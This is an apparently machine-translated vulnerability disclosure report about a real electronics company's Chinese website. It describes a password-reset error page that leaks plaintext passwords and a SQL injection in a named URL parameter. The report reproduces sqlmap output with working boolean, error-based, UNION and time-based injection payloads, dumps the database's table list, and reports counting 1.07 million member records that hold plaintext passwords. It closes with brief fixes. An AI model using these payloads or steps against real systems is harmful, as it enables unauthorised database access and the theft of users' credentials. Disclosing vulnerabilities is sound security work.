Website vulnerability collection of an electronic communication company + 1.07 million member password plaintext and Solution
Website address: www.benq.com. cn2 vulnerabilities:
1. password retrieval causes password leakage;
Go to the main site, click "quick Logon" at the top, click "Remember password", enter the account number and verification code, and the next step will go to the error page, print out the SQL statement, and... In plaintext with a password.
In this case, I felt that the security awareness of this site is not high, and there may be other problems. When I clicked it, I found the following SQL injection.
2. SQL Injection on a page. You can use SQL-shell to view the following important information:
Page URL: http://www.benq.com.cn/support/drivers? Conf_name = monitor & prod_model = BL2201M, where the conf_name parameter can be injected
A) You can view the Administrator account password and other information;
B) query the information of the 1.07 million registered member, including the plaintext of the password.
Question 1: password retrieval vulnerability:
1. Enter the password retrieval page and enter relevant information.
2. After the next step, go to the error page. The MD5 and plaintext values of the password are displayed.
Question 2: SQL Injection
Step 2: display the database name. In fact, you can see the error page above, which is benq.
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:---Place: GETParameter: conf_name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0available databases [2]:[*] benq[*] information_schema
Step 2: List name. Two important tables, auth _ user and member _ users, should be the administrator table and member table.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: conf_name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: conf_name=monitor' AND 9677=9677 AND 'JRvg'='JRvg&prod_model=BL2201M Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: conf_name=monitor' AND (SELECT 8378 FROM(SELECT COUNT(*),CONCAT(0x7167706971,(SELECT (CASE WHEN (8378=8378) THEN 1 ELSE 0 END)),0x71726e6871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kWDG'='kWDG&prod_model=BL2201M Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: conf_name=monitor' UNION ALL SELECT CONCAT(0x7167706971,0x6c726761534a59556d6c,0x71726e6871)#&prod_model=BL2201M Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: conf_name=monitor' AND SLEEP(5) AND 'Pnry'='Pnry&prod_model=BL2201M---web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0Database: benq[89 tables]+----------------------------+| auth__log || auth__operates || auth__user || benq__cms_follow_bak || benq__cms_footer_bak || benq__cms_menu_bak || benq__conf || benq__conf_section || benq__names || benq__names_bak || benq__prod || benq__prod_3dgls || benq__prod_benjoy || benq__prod_box || benq__prod_class || benq__prod_conf || benq__prod_conf_search || benq__prod_conf_search_bak || benq__prod_diy || benq__prod_dsc || benq__prod_dsk || benq__prod_earphone || benq__prod_figure || benq__prod_gaopaiyi || benq__prod_ifp || benq__prod_images || benq__prod_kbd || benq__prod_kmcombo || benq__prod_lcd || benq__prod_lfd || benq__prod_mopo || benq__prod_mouse || benq__prod_pc || benq__prod_printer || benq__prod_prj || benq__prod_scanner || benq__prod_search || benq__prod_subclass || benq__prod_tag || benq__tags || benq__tags_assoc || cms__alt || cms__anchor || cms__article || cms__associate || cms__category || cms__driver || cms__driver_include || cms__email || cms__event || cms__follow || cms__footer || cms__indivi_seo || cms__indivi_seo_bak || cms__info || cms__info_bak || cms__info_include || cms__menu || cms__page || cms__page_section || cms__pic || cms__pic_rule || cms__pic_size || cms__pic_tag || cms__resource || cms__resource_content || cms__resource_html || cms__section_associate || cms__section_layout || cms__section_link || cms__section_template || cms__service_center || cms__service_center_assoc || cms__template || image_move_temp || member__bind || member__prod_reg || member__profile || member__recommend || member__users || mobi__article || mobi__article_category || mobi__buyapply || mobi__info || mobi__layout || mobi__page || mobi__resource || mobi__search || mobi__seo |+----------------------------+
Step 2: Skip the contents of the Administrator table. The password retrieval vulnerability found that the member's password was displayed in plain text, indicating that the database should be the Saved Password in plain text. It slightly confirmed your conjecture and looked at the data of member _ users in the table below, the last column is the plaintext of the password.
Finally, let's take a look at the total number of members, with more than 1.07 million members.
web application technology: PHP 5.4.23back-end DBMS: MySQL 5.0select count(*) from member__users;: '1075524'
Data viewed during the test has been deleted after the dark clouds are submitted ~
Solution:
1. Fixed the password retrieval function and redirected the error page;
2. SQL Injection prevention. You can use nginx and other functions for front-end filtering. The modification workload is small and the effect is good.
To Mingji manufacturer: send a gift, preferably Mingji product. I am your loyal customer.